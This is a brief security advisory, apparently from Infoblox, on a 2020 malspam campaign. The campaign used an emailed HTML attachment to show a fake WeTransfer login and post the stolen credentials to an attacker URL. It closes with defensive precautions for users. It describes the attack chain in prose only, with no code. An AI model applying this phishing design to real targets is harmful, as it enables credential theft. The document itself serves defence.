Malicious Spam Campaign Delivers Static Phishing Page
October 2020 by Infoblox Inc
On 20 September, Infoblox observed a malicious spam (malspam) campaign delivering a malicious HTML file capable of phishing for credentials. While threat actor(s) used generic lures in their emails, the HTML file specifically targeted WeTransfer, a file-sharing service.
2. Customer Impact
Threat actors used a malicious HTML file in this campaign that is not related to any family of malware that Infoblox is aware of. The file harvests and exfiltrates WeTransfer credentials.
3. Campaign Analysis
In this campaign, threat actors sent victims an email with a subject of Request for Quotation-Urgent!!!. While the message body was empty, the email did include an HTML file attachment named order - Copy.html.
4. Attack Chain
The HTML file contains a secondary escaped HTML page embedded in its contents. When the victim opens the attachment, it will unpack the secondary HTML page and alert the user that they are viewing a secure document and need to log in to view its contents. If the user successfully logs into the WeTransfer service, an embedded iframe within the second HTML page will collect and post credentials to an attacker-owned URL. However, if the user fails to log in, the HTML page will alert them that their credentials are invalid.
5. Vulnerabilities and Mitigation
This malspam campaign relies solely on social engineering tactics to persuade the victim into revealing their credentials. As such, Infoblox recommends the following precautions to reduce the possibility of compromise:
• Regularly train users to be aware of potential phishing efforts and how to handle them appropriately.
• Always be suspicious of vague or empty emails, especially if there is a prompt to open an attachment or click on a link.
• Be aware of any attachment’s file type, and never open files that could be a script (.vbs, .cmd, .bat), an internet shortcut file or compression file. Using the latter is a known method for evading detection methods based on file hashes and signatures. Threat actors use them to mask the real malicious file due to email service restrictions on attachment file type.